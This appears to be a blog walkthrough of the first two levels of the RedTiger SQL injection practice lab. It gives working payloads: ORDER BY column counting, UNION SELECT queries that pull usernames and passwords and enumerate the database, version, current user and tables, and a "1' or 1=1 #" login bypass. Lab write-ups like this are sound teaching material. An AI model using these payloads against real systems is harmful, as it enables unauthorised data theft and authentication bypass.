SQL INJECTION(redtiger.lab)-Part1

SQL Injection is a web security vulnerability that allows an attacker to interfere with the queries that an applications send to its database.Thus allowing attackers to view data that they are not normally able to retrieve.Data might be of the users of the application or any other data that the application can access. SQL injection might be quite severe as attacker can modify or delete the data from the database of the application even can compromise the underlying server.

Today we will be performing basic SQL injection in lab of redtigers.

Here we will be doing level 1 and Level 2 for now.

LEVEL 1:

When we choose level 1 we see.

Now when we click 1 website send a get request.

Here Now we try to exploit the parameter cat.

Step 1:

Here our first step will be to determine the no of columns of the table name : level1_users.To make it easy here the table name is provided but we can still perform the attack without knowing the table name.

For determining the table name we can use query order by or select also. Here we will be using order by query .

Now lets pass the query in the parameter cat.

Query to pass: cat= 1 order by 4 #

# means commenting proceeding query.

Here when we use number greater than 4 (5,6 ,so on then ) it will show no category found .and when we use number less than or equal to 4 it will display the category thus from this we get to know that there are 4 columns in the table leve1_users.

Step 2:

Now Next step is to determine through which columns we can extract and display information from the table . For this we can use the Select query.

Query to be used : cat = 1 union select 1,2,3,4 from level1_users #

if table name was not given then we can use

cat =1 union select 1,2,3,4 #

Here output of the query is shown in above figure from this we can see that we can display information using column no 3 and 4 .

Step 3:

Now we can extract username and password from the table using column 3 and 4.

query to be passed:

cat = 1 union select 1,2,username,password from level1_users #

Some extra queries that can be used to gain more information about target(Not needed to complete level 1)

To get information of the database we can use database() in the SQL query.
query : cat =1 union select 1,2,database(),4 #

To get information about the version of the database we use function version()
query : cat =1 union select 1,2,version(),4 #

To get information of the current user we use the function current_user()
query:cat = 1 union select 1,2,current_user(),4 #

To get information about tablename we use ;
query :cat =1 union select ,1,2,table_name,4 from information_schema.tables where table_schema=database() #

LEVEL 2(A Simple login bypass):

When we choose level 2 we get the following interface.

Here from we can see hint is condition . So we know try to insert true statement in both username and password.

username: 1' or 1=1 #

password: 1' or 1=1#

Here writing this true statement will tell the database that the username and password are true and by this we successfully bypass the authentication.

References: